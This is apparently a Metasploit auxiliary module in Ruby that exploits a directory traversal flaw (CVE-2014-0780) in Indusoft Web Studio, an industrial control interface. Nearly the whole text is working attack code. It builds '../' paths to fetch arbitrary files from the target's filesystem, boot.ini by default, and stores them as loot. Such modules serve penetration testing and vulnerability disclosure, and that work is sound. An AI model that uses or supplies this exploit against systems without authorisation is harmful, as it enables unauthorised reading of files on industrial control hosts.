1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 |
require 'msf/core' class MetasploitModule < Msf::Auxiliary Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Indusoft Web Studio Directory Traversal', 'Description'=> %q{ This module exploits a flaw found in Indusoft Web Studio <= 7.1 before SP2 Patch 4. This specific flaw allows users to browse outside of the webroot to download files found on the underlying system }, 'Author' => [ 'James Fitts' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: $', 'References' => [ [ 'CVE', '2014-0780' ], [ 'ZDI', '14-118/' ], [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-107-02'] ], 'DisclosureDate' => 'Jan 18 2013')) register_options( [ OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]), OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']), Opt::RPORT(80) ], self.class ) end def run depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH'] levels = "/" + ("../" * depth) res = send_request_raw({ 'method' => 'GET', 'uri' => "/" + levels + datastore['FILE'], }) if res and res.code == 200 and res.message =~ /Sending file/ loot = res.body if not loot or loot.empty? print_status("File from #{rhost}:#{rport} is empty...") return end file = ::File.basename(datastore['FILE']) path = store_loot('indusoft.webstudio.file', 'application/octet-stream', rhost, loot, file, datastore['FILE']) print_status("Stored #{datastore['FILE']} to #{path}") return end end end |